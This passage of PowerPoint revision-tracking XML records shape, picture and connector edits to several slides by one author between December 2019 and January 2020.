            <pc:sldMk cId="1746601606" sldId="261"/>
            <ac:spMk id="18" creationId="{E844E128-FF69-4E9F-8327-6B504B3C5AE1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:20:46.942" v="1379" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1746601606" sldId="261"/>
            <ac:picMk id="4" creationId="{9DD35256-58BB-7446-BE6E-42AE2ACF56C8}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:20:48.770" v="1381" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1746601606" sldId="261"/>
            <ac:picMk id="5" creationId="{7BEDB464-90C4-3144-BA9F-BE3AF669F04D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:19:50.769" v="1378" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1746601606" sldId="261"/>
            <ac:cxnSpMk id="11" creationId="{4364CDC3-ADB0-4691-9286-5925F160C2D5}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:19:50.769" v="1378" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1746601606" sldId="261"/>
            <ac:cxnSpMk id="20" creationId="{055CEADF-09EA-423C-8C45-F94AF44D5AF0}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg setClrOvrMap">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:29:58.470" v="1649"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2424195713" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:28:16.459" v="1643" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424195713" sldId="263"/>
            <ac:spMk id="2" creationId="{6E271AD3-2C2E-D34C-8C32-87B266CADE4E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:28:08.504" v="1642" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424195713" sldId="263"/>
            <ac:spMk id="3" creationId="{191699A1-E6B2-534B-AD9C-0398E3C894F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:29:58.470" v="1649"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424195713" sldId="263"/>
            <ac:spMk id="4" creationId="{8EC8172C-8950-D749-93FA-56DAF69BB8DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:28:08.504" v="1642" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424195713" sldId="263"/>
            <ac:spMk id="14" creationId="{3741B58E-3B65-4A01-A276-975AB2CF8A08}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:28:08.504" v="1642" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424195713" sldId="263"/>
            <ac:spMk id="15" creationId="{7AAC67C3-831B-4AB1-A259-DFB839CAFAFC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:28:16.459" v="1643" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424195713" sldId="263"/>
            <ac:spMk id="22" creationId="{EE1530B0-6F96-46C0-8B3E-3215CB756BE4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:28:16.459" v="1643" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424195713" sldId="263"/>
            <ac:spMk id="24" creationId="{754910CF-1B56-45D3-960A-E89F7B3B9131}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:28:16.459" v="1643" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424195713" sldId="263"/>
            <ac:spMk id="29" creationId="{103E59AE-44F8-4FB9-BF05-C888FE3E1DFA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:28:16.459" v="1643" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424195713" sldId="263"/>
            <ac:spMk id="33" creationId="{8B6B14AE-589A-45CC-A30D-41995FC1F8BA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:29:37.854" v="1645"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424195713" sldId="263"/>
            <ac:graphicFrameMk id="17" creationId="{026A0CE3-EF81-46F4-BB0E-DB7DD7741FDE}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:28:16.459" v="1643" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424195713" sldId="263"/>
            <ac:cxnSpMk id="31" creationId="{2752F38C-F560-47AA-90AD-209F39C04150}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:30:06.776" v="1652" actId="400"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4137169216" sldId="264"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:30:06.776" v="1652" actId="400"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137169216" sldId="264"/>
            <ac:graphicFrameMk id="17" creationId="{026A0CE3-EF81-46F4-BB0E-DB7DD7741FDE}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T23:15:04.367" v="8881" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="70929467" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:31:33.013" v="1674" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="70929467" sldId="265"/>
            <ac:spMk id="2" creationId="{2A40D9A2-A268-5446-B7EB-6EDA74A613CB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T23:15:04.367" v="8881" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="70929467" sldId="265"/>
            <ac:spMk id="3" creationId="{345581C7-CC13-5846-85BE-AF30E808C03E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:37:31.188" v="2181" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="70929467" sldId="265"/>
            <ac:spMk id="5" creationId="{445ADBAE-0D5F-4F4D-9317-CECAC5B61BCD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:37:57.739" v="2198" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="70929467" sldId="265"/>
            <ac:picMk id="4" creationId="{D96AE7E4-C94B-CD41-B5E7-1D59D3219A36}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg setClrOvrMap">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-04T00:32:41.153" v="8887" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4137456744" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:30.765" v="2248" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="2" creationId="{0F484F70-4345-2E43-B28C-DD2BD1443C5E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:23.620" v="2235" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="3" creationId="{BD27EBFC-395A-A14C-AB09-27B5166A76EE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:30.765" v="2248" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="6" creationId="{39E3965E-AC41-4711-9D10-E25ABB132D86}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:30.765" v="2248" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="8" creationId="{F452A527-3631-41ED-858D-3777A7D1496A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:38:57.976" v="2213" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="9" creationId="{39E3965E-AC41-4711-9D10-E25ABB132D86}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:38:57.976" v="2213" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="13" creationId="{6482F060-A4AF-4E0B-B364-7C6BA4AE9C03}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:30.765" v="2248" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="14" creationId="{39E3965E-AC41-4711-9D10-E25ABB132D86}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:38:59.589" v="2215" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="17" creationId="{C390A367-0330-4E03-9D5F-40308A7975C8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:38:59.589" v="2215" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="18" creationId="{39E3965E-AC41-4711-9D10-E25ABB132D86}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:38:59.589" v="2215" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="21" creationId="{7319A1DD-F557-4EC6-8A8C-F7617B4CD678}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:02.973" v="2217" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="24" creationId="{39E3965E-AC41-4711-9D10-E25ABB132D86}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:02.973" v="2217" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="27" creationId="{6482F060-A4AF-4E0B-B364-7C6BA4AE9C03}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:30.765" v="2248" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="29" creationId="{0AF4F2BA-3C03-4E2C-8ABC-0949B61B3C5E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:16.184" v="2227" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="30" creationId="{39E3965E-AC41-4711-9D10-E25ABB132D86}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:16.184" v="2227" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="32" creationId="{6482F060-A4AF-4E0B-B364-7C6BA4AE9C03}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:30.765" v="2248" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:spMk id="35" creationId="{B40A8CA7-7D5A-43B0-A1A0-B558ECA9EED1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:38:57.976" v="2213" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:picMk id="5" creationId="{9AF5126D-FD30-4B82-992C-8275D3490676}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-04T00:32:41.153" v="8887" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:picMk id="10" creationId="{B13E5A2F-87CE-4402-B004-17FC8414E070}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:38:59.589" v="2215" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:picMk id="20" creationId="{6AF569F9-9DE1-4C30-8357-29C1E8AD8ABA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:02.973" v="2217" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:picMk id="26" creationId="{7C0DF138-41F8-4D21-8F76-8C296A1BF0DE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:16.184" v="2227" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:picMk id="34" creationId="{9AF5126D-FD30-4B82-992C-8275D3490676}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:30.765" v="2248" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:cxnSpMk id="7" creationId="{1F5DC8C3-BA5F-4EED-BB9A-A14272BD82A1}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:38:57.976" v="2213" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:cxnSpMk id="11" creationId="{1F5DC8C3-BA5F-4EED-BB9A-A14272BD82A1}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:30.765" v="2248" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:cxnSpMk id="12" creationId="{D28A9C89-B313-458F-9C85-515930A51A93}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:38:57.976" v="2213" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:cxnSpMk id="15" creationId="{B9EB6DAA-2F0C-43D5-A577-15D5D2C4E3F5}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:30.765" v="2248" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:cxnSpMk id="16" creationId="{1F5DC8C3-BA5F-4EED-BB9A-A14272BD82A1}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:38:59.589" v="2215" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:cxnSpMk id="19" creationId="{1F5DC8C3-BA5F-4EED-BB9A-A14272BD82A1}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:38:59.589" v="2215" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:cxnSpMk id="22" creationId="{D28A9C89-B313-458F-9C85-515930A51A93}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:30.765" v="2248" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:cxnSpMk id="23" creationId="{A07787ED-5EDC-4C54-AD87-55B60D0FE397}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:02.973" v="2217" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:cxnSpMk id="25" creationId="{1F5DC8C3-BA5F-4EED-BB9A-A14272BD82A1}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:02.973" v="2217" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:cxnSpMk id="28" creationId="{B9EB6DAA-2F0C-43D5-A577-15D5D2C4E3F5}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:16.184" v="2227" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:cxnSpMk id="31" creationId="{1F5DC8C3-BA5F-4EED-BB9A-A14272BD82A1}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T20:39:16.184" v="2227" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137456744" sldId="266"/>
            <ac:cxnSpMk id="33" creationId="{B9EB6DAA-2F0C-43D5-A577-15D5D2C4E3F5}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg setClrOvrMap">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:21:34.748" v="2924"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3066096953" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
